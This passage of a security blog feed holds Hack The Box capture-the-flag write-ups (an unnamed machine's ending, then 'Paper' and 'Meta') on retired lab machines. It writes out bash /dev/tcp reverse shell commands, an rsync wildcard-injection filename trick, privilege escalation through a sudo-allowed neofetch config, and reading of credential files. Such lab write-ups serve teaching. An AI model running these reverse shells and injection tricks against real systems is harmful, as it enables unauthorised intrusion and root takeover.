</code></pre><p>I then logged in to SSH through the reverse shell by upgrading the tty and using the regular SSH command.</p>
<pre tabindex="0"><code>$ python3 -c &#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;
wp_user@phoenix:/$ ssh editor@10.11.12.13
$$$$$$$\  $$\                                     $$\
$$  __$$\ $$ |                                    \__|
$$ |  $$ |$$$$$$$\   $$$$$$\   $$$$$$\  $$$$$$$\  $$\ $$\   $$\
$$$$$$$  |$$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$ |\$$\ $$  |
$$  ____/ $$ |  $$ |$$ /  $$ |$$$$$$$$ |$$ |  $$ |$$ | \$$$$  /
$$ |      $$ |  $$ |$$ |  $$ |$$   ____|$$ |  $$ |$$ | $$  $$&lt;
$$ |      $$ |  $$ |\$$$$$$  |\$$$$$$$\ $$ |  $$ |$$ |$$  /\$$\
\__|      \__|  \__| \______/  \_______|\__|  \__|\__|\__/  \__|
Password: superphoenix
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)
&lt;REDACTED&gt;
editor@phoenix:~$ id
uid=1002(editor) gid=1002(editor) groups=1002(editor)
editor@phoenix:~$ cat user.txt
e8ba02d7b9af2&lt;REDACTED&gt;
</code></pre><p>After gaining SSH access as the user <code>editor</code>, I found that the <code>/backups</code> folder was writable. Further enumeration revealed a binary file <code>cron.sh.x</code> in <code>/usr/local/bin</code>.</p>
<pre tabindex="0"><code>editor@phoenix:/$ ls -l | grep backups
drwxr-x---   2 editor editor  4096 Jun 27 08:57 backups
editor@phoenix:/$ ls -l /usr/local/bin
total 16
-rwxr-xr-x 1 root root 15392 Feb 16 22:27 cron.sh.x
editor@phoenix:/$ file /usr/local/bin/cron.sh.x
/usr/local/bin/cron.sh.x: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7afde696e476ac5d8300e407cbfb9ec08a9b7f07, for GNU/Linux 3.2.0, stripped
</code></pre><p><code>cron.sh.x</code> was a compiled shell script using <code>shc</code>. Unable to decompile it with <code>UnSHc</code>, I used <code>pspy64</code> to monitor its activity.</p>
<pre tabindex="0"><code>editor@phoenix:/tmp$ ./pspy64 &amp;
editor@phoenix:/tmp$ /usr/local/bin/cron.sh.x
&lt;REDACTED&gt;
#!/bin/sh
NOW=$(date +&#34;%Y-%m-%d-%H-%M&#34;)
FILE=&#34;phoenix.htb.$NOW.tar&#34;
cd /backups
mysqldump -u root wordpress &gt; dbbackup.sql
tar -cf $FILE dbbackup.sql &amp;&amp; rm dbbackup.sql
gzip -9 $FILE
find . -type f -mmin +30 -delete
rsync --ignore-existing -t *.* jit@10.11.12.14:/backups/
&lt;REDACTED&gt;
</code></pre><p>From the script source, I discovered that I could perform wildcard injection on the <code>rsync</code> command. The <code>rsync</code> command&rsquo;s <code>-e</code> option is used to execute commands. (Reference: <a href="https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c">https://systemweakness.com/privilege-escalation-using-wildcard-injection-tar-wildcard-injection-a57bc81df61c</a>)</p>
<p>I created a malicious script to exploit this:</p>
<pre tabindex="0"><code>editor@phoenix:/backups$ echo -e &#39;bash -c &#34;bash -i &gt;&amp; /dev/tcp/&lt;IP&gt;/&lt;PORT&gt; 0&gt;&amp;1&#34;&#39; &gt; x.sh
editor@phoenix:/backups$ touch -- &#39;-e bash x.sh&#39;
editor@phoenix:/backups$ ls
&#39;-e bash x.sh&#39;
&lt;REDACTED&gt;
x.sh
</code></pre><p>I started a listener on my local machine and waited for a connection from the machine.</p>
<pre tabindex="0"><code>$ nc -nvlp 5555
Listening on 0.0.0.0 5555
Connection received on 10.10.11.149 47634
bash: cannot set terminal process group (38509): Inappropriate ioctl for device
bash: no job control in this shell
root@phoenix:/backups# id
uid=0(root) gid=0(root) groups=0(root)
root@phoenix:/backups#

 cat /root/root.txt
e58a0f73b3337&lt;REDACTED&gt;
</code></pre><p>Rooted!</p>
]]></content></item><item><title>Hackthebox Paper</title><link>http://blog.bgz.app/posts/hackthebox-paper/</link><pubDate>Mon, 20 Jun 2022 21:10:32 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-paper/</guid><description>Paper is a machine with the Linux OS and is classified as easy. This machine has been retired and replaced by a new machine called Trick.
Machine IP: 10.10.11.143
As usual, I performed a service and port scan using Nmap and got the following result:
Nmap scan report for paper.htb (10.10.11.143) Host is up (0.11s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.</description><content type="html"><![CDATA[<p>Paper is a machine with the Linux OS and is classified as easy. This machine has been retired and replaced by a new machine called Trick.</p>
<p><strong>Machine IP:</strong> 10.10.11.143</p>
<p>As usual, I performed a service and port scan using Nmap and got the following result:</p>
<pre tabindex="0"><code>Nmap scan report for paper.htb (10.10.11.143)
Host is up (0.11s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
</code></pre><p>There was a suspicious header on port 80 that I suspected might be a domain for the machine.</p>
<pre tabindex="0"><code>me@nowhere:~/htb/paper$ curl -I 10.10.11.143
HTTP/1.1 403 Forbidden
Date: Mon, 20 Jun 2022 08:29:09 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: &#34;30c0b-5c5c7fdeec240&#34;
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8
</code></pre><p>I added the domain <code>office.paper</code> to the hosts file on my local machine. When I accessed <a href="http://office.paper/">http://office.paper/</a>, there was a website running a WordPress CMS, so I conducted a scan using WPScan.</p>
<pre tabindex="0"><code>[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, &lt;generator&gt;https://wordpress.org/?v=5.2.3&lt;/generator&gt;
 |  - http://office.paper/index.php/comments/feed/, &lt;generator&gt;https://wordpress.org/?v=5.2.3&lt;/generator&gt;
</code></pre><p>Since I saw that the WordPress version was 5.2.3, which is quite old, I searched for vulnerabilities and found that this version had a flaw allowing the reading of unpublished drafts by accessing <a href="http://office.paper/?static=1">http://office.paper/?static=1</a>. (CVE-2019–17671).</p>
<p><img src="https://miro.medium.com/v2/resize:fit:720/format:webp/1*Lf-9fuwAtehE2Vs2zrSiDQ.png" alt="draft"></p>
<p>Here, I found a new subdomain, <code>chat.office.paper</code>, and a URL for employee registration. I added this subdomain to my hosts file and accessed the provided URL.</p>
<p>After registering, I opened the general channel and sent a direct message to the bot Recyclops. Recyclops has commands for reading files (<code>file</code>), listing directories (<code>list</code>), and showing the time (<code>time</code>). There is also a hidden command, <code>run</code>, for executing commands, which I found by reading the Hubot source code. This command can be used for a reverse shell, but there is an easier method: reading the password of the user <code>dwight</code> stored in <code>../hubot/.env</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:640/format:webp/1*TCmriWx4r87SsxxbAH398Q.png" alt="hubot"></p>
<p>I logged into the SSH service using the username <code>dwight</code> and password <code>Queenofblad3s!23</code> and retrieved the user.txt file.</p>
<pre tabindex="0"><code>[dwight@paper ~]$ id
uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
[dwight@paper ~]$ cat user.txt
96b5646a650f6[redacted]
</code></pre><p>I performed enumeration using LinPeas.sh and found that the machine was vulnerable to CVE-2021–3560.</p>
<p>I saved the exploit file to my local machine, transferred it to the Paper machine, and executed it using Python to gain a shell as root.</p>
<pre tabindex="0"><code>[root@paper tmp]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper tmp]# cat /root/root.txt
c8cd82908786116[redacted]
</code></pre><p>Rooted!</p>
]]></content></item><item><title>Hackthebox Meta</title><link>http://blog.bgz.app/posts/hackthebox-meta/</link><pubDate>Mon, 13 Jun 2022 19:56:30 +0700</pubDate><guid>http://blog.bgz.app/posts/hackthebox-meta/</guid><description>Meta is a machine running Linux with a medium difficulty level. Since this machine has been retired, I have created a writeup for it.
Machine IP: 10.10.11.140
The first thing I did was scan the machine using nmap to discover open ports and services.
Nmap scan report for 10.10.11.140 Host is up (0.11s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.</description><content type="html"><![CDATA[<p>Meta is a machine running Linux with a medium difficulty level. Since this machine has been retired, I have created a writeup for it.</p>
<p><strong>Machine IP:</strong> 10.10.11.140</p>
<p>The first thing I did was scan the machine using nmap to discover open ports and services.</p>
<pre tabindex="0"><code>Nmap scan report for 10.10.11.140
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre><p>Next, I added the domain to the hosts file. After performing a directory brute force on the website and not finding anything, I attempted to brute force the subdomains using <code>ffuf</code>.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*DKwJS6aK_-zlMD3igOfhEw.png" alt="ffuf"></p>
<p>A subdomain, <code>dev01.artcorp.htb</code>, was found, so I added it to the hosts file. When I accessed the website, I found a web app called “MetaView” that can display metadata from uploaded images.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*E8TuvSt1jXULccN8GBKM0w.png" alt="web"></p>
<p>Knowing that the web app uses ExifTool, I exploited a remote code execution vulnerability (CVE-2021-22204) to gain a reverse shell.</p>
<pre tabindex="0"><code>www-data@meta:/dev/shm$ ./pspy64
2022/06/09 16:04:22 CMD: UID=0    PID=1     | /sbin/init
2022/06/09 16:05:01 CMD: UID=0    PID=18397 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18396 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18398 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=1000 PID=18399 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=1000 PID=18400 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=0    PID=18402 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=0    PID=18401 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=1000 PID=18403 | pkill mogrify
</code></pre><p>I discovered a command executed repeatedly by the user thomas (UID 1000). When I opened the <code>convert_images.sh</code> file, I found it contained several commands to convert images to PNG format. I checked the ImageMagick version used, which was 7.0.10-36, vulnerable to command injection (CVE-2020-29599). I used the following payload in <code>poc.svg</code> to obtain the private key of the user thomas.</p>
<script src="https://gist.github.com/bl33dz/4bbecf1c95ffb8711d99d7b268eccda8.js"></script>

<p>By moving the <code>poc.svg</code> file to <code>/var/www/dev01.artcorp.htb/convert_images/</code>, I could see the result in the directory <code>/dev/shm/c</code>, which I had created beforehand. This result file was the <code>id_rsa</code> private key for the user thomas. I just needed to transfer this file to my local machine and use it to log in via SSH.</p>
<pre tabindex="0"><code>me@nowhere:~/htb/meta$ ls -l id_rsa
-rw------- 1 me me 2590 Jun  9 13:26 id_rsa
me@nowhere:~/htb/meta$ ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun  9 11:47:48 2022 from 10.10.14.210
thomas@meta:~$ cat user.txt
[redacted]
</code></pre><p>After gaining access to the user, I used <code>LinPeas.sh</code> to enumerate and found that the user thomas could execute the command <code>neofetch</code> as root without a password.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1100/format:webp/1*HAcCm9S0vPw7-pthD7b6UQ.png" alt="linpeas"></p>
<p>I modified the file <code>/home/thomas/.config/neofetch/config.conf</code> by adding a line containing a reverse shell command to my local machine:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>bash -c <span style="color:#e6db74">&#39;bash -i &gt;&amp; /dev/tcp/[LOCAL_IP]/4444 0&gt;&amp;1&#39;</span>
</span></span></code></pre></div><p>I also changed the <code>$XDG_CONFIG_HOME</code> environment variable to <code>/home/thomas/.config</code> to ensure that the <code>neofetch</code> command uses the configuration for the user thomas.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>export XDG_CONFIG_HOME<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;</span>$HOME<span style="color:#e6db74">/.config&#34;</span>
</span></span><span style="display:flex;"><span>sudo neofetch <span style="color:#e6db74">&#34;\&#34;\&#34;&#34;</span>
</span></span></code></pre></div><p>Execute the <code>neofetch</code> command to get a reverse shell as root.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:786/format:webp/1*wGBqvkywBxHs2fpL_KccTQ.png" alt="neofetch"></p>
<p>Rooted!</p>
]]></content></item><item><title>Moved to Hugo</title><link>http://blog.bgz.app/posts/moved-to-hugo/</link><pubDate>Sat, 01 Jan 2000 00:00:01 +0700</pubDate><guid>http://blog.bgz.app/posts/moved-to-hugo/</guid><description/><content type="html"></content></item></channel></rss>